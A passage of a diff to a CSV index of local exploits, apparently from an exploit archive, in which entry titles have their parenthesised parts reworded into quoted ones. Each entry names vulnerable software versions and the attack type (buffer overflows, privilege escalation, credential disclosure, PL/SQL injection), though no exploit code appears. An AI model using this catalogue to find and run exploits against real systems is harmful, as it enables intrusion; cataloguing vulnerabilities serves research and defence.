'mysql_connect function' Local Buffer Overflow",2006-01-05,mercenary,windows,local,0 @@ -5997,18 +6002,18 @@ id,file,description,date,author,platform,type,port 1425,platforms/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,linux,local,0 1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",linux,local,0 1449,platforms/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow",2006-01-25,"rod hedor",linux,local,0 -1455,platforms/windows/local/1455.txt,"Oracle Database Server 9i/10g - (XML) Buffer Overflow",2006-01-26,Argeniss,windows,local,0 +1455,platforms/windows/local/1455.txt,"Oracle Database Server 9i/10g - 'XML' Buffer Overflow",2006-01-26,Argeniss,windows,local,0 1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Privilege Escalation (2)",2006-02-12,"Andres Tarasco",windows,local,0 1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (1)",2006-02-06,bratax,windows,local,0 -1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Privilege Escalation",2006-02-08,kokanin,qnx,local,0 +1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation",2006-02-08,kokanin,qnx,local,0 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation",2006-02-08,kokanin,qnx,local,0 1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (2)",2006-02-11,k3xji,windows,local,0 1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (3)",2006-02-14,darkeagle,windows,local,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (2)",2006-02-20,"Marco Ivaldi",linux,local,0 -1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 - (ptrace) Privilege Escalation",2006-02-26,prdelka,sco,local,0 +1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 - 'ptrace' Privilege Escalation",2006-02-26,prdelka,sco,local,0 1545,platforms/osx/local/1545.pl,"Apple Mac OSX - '/usr/bin/passwd' Custom Passwd Privilege Escalation",2006-03-01,vade79,osx,local,0 40340,platforms/windows/local/40340.txt,"WIN-911 7.17.00 - Multiple Vulnerabilities",2016-09-06,sh4d0wman,windows,local,0 -1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow",2006-03-05,"Agustin Gianni",multiple,local,0 +1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - BitsPerSample Tag Local Buffer Overflow",2006-03-05,"Agustin Gianni",multiple,local,0 1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - '.dbp' Buffer Overflow",2006-03-05,Kozan,windows,local,0 1577,platforms/irix/local/1577.sh,"SGI IRIX 6.5.28 - 'runpriv' Design Error",2005-10-10,anonymous,irix,local,0 1579,platforms/linux/local/1579.pl,"Ubuntu 5.10 Installer - Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 @@ -6024,7 +6029,7 @@ id,file,description,date,author,platform,type,port 1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0 1910,platforms/windows/local/1910.c,"Microsoft Windows - NtClose DeadLock (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 1911,platforms/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0 -1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow",2006-06-15,c0rrupt,windows,local,0 +1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - Long Filename Buffer Overflow",2006-06-15,c0rrupt,windows,local,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0 1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution",2006-06-22,"naveed afzal",windows,local,0 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack/Buffer Overflow (SEH)",2006-06-27,FistFuXXer,windows,local,0 @@ -6034,7 +6039,7 @@ id,file,description,date,author,platform,type,port 1985,platforms/windows/local/1985.py,"WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow",2006-07-05,muts,windows,local,0 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 - Hlink Local Buffer Overflow (French)",2006-07-06,NSRocket,windows,local,0 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian)",2006-07-06,oveRet,windows,local,0 -1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 +1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 - Hlink Local Buffer Overflow (PoC)",2006-07-09,"SYS 49152",windows,local,0 2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (2)",2006-07-12,"Julien Tinnes",linux,local,0 @@ -6053,25 +6058,25 @@ id,file,description,date,author,platform,type,port 2107,platforms/osx/local/2107.pl,"Apple Mac OSX 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2108,platforms/osx/local/2108.sh,"Apple Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2111,platforms/osx/local/2111.pl,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow (2)",2006-08-02,"Kevin Finisterre",osx,local,0 -2144,platforms/linux/local/2144.sh,"liblesstif 2-0.93.94-4mdk - (DEBUG_FILE) Privilege Escalation",2006-08-08,"Karol Wiesek",linux,local,0 +2144,platforms/linux/local/2144.sh,"liblesstif 2-0.93.94-4mdk - 'DEBUG_FILE' Privilege Escalation",2006-08-08,"Karol Wiesek",linux,local,0 2152,platforms/php/local/2152.php,"PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow (PoC)",2006-08-08,Heintz,php,local,0 2193,platforms/linux/local/2193.php,"PHP 4.4.3/5.1.4 - 'sscanf' Local Buffer Overflow",2006-08-16,Andi,linux,local,0 2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)",2006-08-22,"Marco Ivaldi",solaris,local,0 2242,platforms/solaris/local/2242.sh,"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 -2264,platforms/windows/local/2264.htm,"VMware 5.5.1 - (ActiveX) Local Buffer Overflow",2006-08-27,c0ntex,windows,local,0 +2264,platforms/windows/local/2264.htm,"VMware 5.5.1 - 'ActiveX' Local Buffer Overflow",2006-08-27,c0ntex,windows,local,0 2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - '.ZIP' File Handling Local Buffer Overflow",2006-08-30,bratax,windows,local,0 2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0 2286,platforms/windows/local/2286.cpp,"PowerZip 7.06.38950 - Long Filename Handling Buffer Overflow",2006-09-01,bratax,windows,local,0 2330,platforms/solaris/local/2330.c,"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (1)",2006-09-08,"RISE Security",solaris,local,0 2331,platforms/solaris/local/2331.c,"X11R6 < 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0 2332,platforms/sco/local/2332.c,"X11R6 < 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local,0 -2338,platforms/linux/local/2338.c,"openmovieeditor 0.0.20060901 - (name) Local Buffer Overflow",2006-09-09,Qnix,linux,local,0 +2338,platforms/linux/local/2338.c,"openmovieeditor 0.0.20060901 - 'name' Local Buffer Overflow",2006-09-09,Qnix,linux,local,0 2360,platforms/solaris/local/2360.c,"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)",2006-09-13,"Marco Ivaldi",solaris,local,0 -2404,platforms/linux/local/2404.c,"Dr.Web AntiVirus 4.33 - (LHA long Directory name) Local Overflow",2006-09-20,Guay-Leroux,linux,local,0 +2404,platforms/linux/local/2404.c,"Dr.Web AntiVirus 4.33 - LHA long Directory name Local Overflow",2006-09-20,Guay-Leroux,linux,local,0 2412,platforms/windows/local/2412.c,"Microsoft Windows Kernel - Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,windows,local,0 2463,platforms/osx/local/2463.c,"Apple Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0 2464,platforms/osx/local/2464.pl,"Apple Mac OSX 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0 -2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0 +2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - cpwrap via MySQLAdmin Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0 2492,platforms/linux/local/2492.s,".ELF Binaries - Privilege Escalation",2006-10-08,Sha0,linux,local,0 2543,platforms/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0 2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0 @@ -6079,23 +6084,23 @@ id,file,description,date,author,platform,type,port 2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation (Root File Create)",2006-10-16,"Kevin Finisterre",osx,local,0 2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 -2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 -2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - (swask) Format String Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 +2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - 'swmodify' Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 +2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - 'swask' Format String Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",solaris,local,0 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 -2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (Unsafe System Call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 +2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - Unsafe System Call Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0 -2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0 -2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - (ASX Filename) Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0 +2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - '.M3U' Filename Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0 +2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0 2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0 2873,platforms/windows/local/2873.c,"AtomixMP3 < 2.3 - '.m3u' Buffer Overflow",2006-11-30,"Greg Linares",windows,local,0 2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - '.PLF' Buffer Overflow (PoC)",2006-12-01,"Greg Linares",windows,local,0 2950,platforms/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0 3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure",2006-12-27,"Ruben Santamarta",windows,local,0 -3070,platforms/osx/local/3070.pl,"VideoLAN VLC Media Player 0.8.6 (x86) - (udp://) Format String",2007-01-02,MoAB,osx,local,0 +3070,platforms/osx/local/3070.pl,"VideoLAN VLC Media Player 0.8.6 (x86) - 'udp://' Format String",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - 'NtRaiseHardError' Privilege Escalation",2007-01-03,erasmus,windows,local,0 3087,platforms/osx/local/3087.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 3088,platforms/osx/local/3088.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM (cron) Privilege Escalation",2007-01-05,MoAB,osx,local,0 @@ -6112,11 +6117,11 @@ id,file,description,date,author,platform,type,port 3178,platforms/multiple/local/3178.txt,"Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3179,platforms/multiple/local/3179.txt,"Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3181,platforms/osx/local/3181.rb,"Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Privilege Escalation",2007-01-23,MoAB,osx,local,0 -3213,platforms/linux/local/3213.c,"Trend Micro VirusWall 3.81 - (vscan/VSAPI) Local Buffer Overflow",2007-01-28,"Sebastian Wolfgarten",linux,local,0 -3219,platforms/osx/local/3219.rb,"Apple Mac OSX 10.4.8 (8L2127) - crashdump Privilege Escalation",2007-01-29,MoAB,osx,local,0 +3213,platforms/linux/local/3213.c,"Trend Micro VirusWall 3.81 - 'vscan/VSAPI' Local Buffer Overflow",2007-01-28,"Sebastian Wolfgarten",linux,local,0 +3219,platforms/osx/local/3219.rb,"Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Privilege Escalation",2007-01-29,MoAB,osx,local,0 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (Spooler Service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0 3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0 -3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 +3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - 'ps' Information Leak Exploit",2007-02-06,bunker,tru64,local,0 3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local,0 @@ -6132,12 +6137,12 @@ id,file,description,date,author,platform,type,port 3424,platforms/multiple/local/3424.php,"PHP 5.2.1 - 'substr_compare()' Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 3426,platforms/linux/local/3426.php,"PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution",2007-03-07,"Stefan Esser",linux,local,0 3427,platforms/linux/local/3427.php,"PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure",2007-03-07,"Stefan Esser",linux,local,0 -3429,platforms/windows/local/3429.php,"PHP 'COM' Extensions - (inconsistent Win32) 'safe_mode' Bypass Exploit",2007-03-07,anonymous,windows,local,0 +3429,platforms/windows/local/3429.php,"PHP 'COM' Extensions - inconsistent Win32 'safe_mode' Bypass Exploit",2007-03-07,anonymous,windows,local,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0 -3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Escalation",2007-03-10,"Cesar Cerrudo",win_x86,local,0 +3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - 'PROCESS_DUP_HANDLE' Local Privilege Escalation",2007-03-10,"Cesar Cerrudo",win_x86,local,0 3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0 3479,platforms/linux/local/3479.php,"PHP 5.2.1 - 'session_regenerate_id()' Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 @@ -6163,7 +6168,7 @@ id,file,description,date,author,platform,type,port 3688,platforms/windows/local/3688.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0 3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0 -3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution",2007-04-13,InTeL,windows,local,0 +3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution",2007-04-13,InTeL,windows,local,0 3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 3755,platforms/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local,0 @@ -6186,7 +6191,7 @@ id,file,description,date,author,platform,type,port 3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)",2007-05-28,n00b,windows,local,0 4002,platforms/windows/local/4002.py,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)",2007-05-28,"Thomas Pollet",windows,local,0 -4013,platforms/osx/local/4013.txt,"Apple Mac OSX < 2007-005 - (vpnd) Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local,0 +4013,platforms/osx/local/4013.txt,"Apple Mac OSX < 2007-005 - 'vpnd' Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local,0 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local,0 @@ -6246,8 +6251,8 @@ id,file,description,date,author,platform,type,port 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Stack Overflow",2008-01-05,Trancek,windows,local,0 4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,windows,local,0 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,windows,local,0 -4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 -4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 +4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection 'get users hash'",2008-01-28,sh2kerr,multiple,local,0 +4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection 'get users hash'",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0 4998,platforms/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0 5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 @@ -6264,7 +6269,7 @@ id,file,description,date,author,platform,type,port 5250,platforms/windows/local/5250.cpp,"VideoLAN VLC Media Player 0.8.6e - Subtitle Parsing Local Buffer Overflow",2008-03-14,"Mai Xuan Cuong",windows,local,0 5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,windows,local,0 5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0 -5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - (FontName) Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0 +5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - 'FontName' Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0 5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalation",2008-04-04,qaaz,sco,local,0 5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA 1.1.4 - Privilege Escalation",2008-04-04,qaaz,sco,local,0 5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - 'mcd' Privilege Escalation",2008-04-04,qaaz,sco,local,0 @@ -6282,13 +6287,13 @@ id,file,description,date,author,platform,type,port 5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)",2008-06-26,Shinnok,windows,local,0 5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - 'vga' Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0 6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,windows,local,0 -6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0 +6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - Export Name Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0 6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0 6039,platforms/windows/local/6039.c,"Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow",2008-07-11,Shinnok,windows,local,0 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)",2008-07-21,"Guido Landi",windows,local,0 6157,platforms/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",windows,local,0 6188,platforms/windows/local/6188.c,"IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0 -6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow",2008-08-28,Koshi,windows,local,0 +6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - 'mx4' Local Buffer Overflow",2008-08-28,Koshi,windows,local,0 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0 6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,windows,local,0 6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0 @@ -6311,7 +6316,7 @@ id,file,description,date,author,platform,type,port 40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA Root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0 -7313,platforms/linux/local/7313.sh,"Debian - (Symlink In Login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 +7313,platforms/linux/local/7313.sh,"Debian - Symlink In Login Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow",2008-12-03,Encrypt3d.M!nd,windows,local,0 7334,platforms/windows/local/7334.pl,"RadASM 2.2.1.5 - '.rap' WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 7347,platforms/windows/local/7347.pl,"PEiD 0.92 - '.PE' File Universal Buffer Overflow",2008-12-05,SkD,windows,local,0 @@ -6327,7 +6332,7 @@ id,file,description,date,author,platform,type,port 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0 -7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow",2008-12-29,His0k4,windows,local,0 +7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - 'ProxyLogin' Local Stack Overflow",2008-12-29,His0k4,windows,local,0 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0 7646,platforms/multiple/local/7646.txt,"PHP 5.2.8 gd library - 'imageRotate()' Information Leak",2009-01-02,"Hamid Ebadi",multiple,local,0 7651,platforms/windows/local/7651.py,"Destiny Media Player 1.61 - '.m3u' Local Stack Overflow",2009-01-03,His0k4,windows,local,0 @@ -6340,7 +6345,7 @@ id,file,description,date,author,platform,type,port 7675,platforms/multiple/local/7675.txt,"Oracle 10g - SYS.LT.REMOVEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 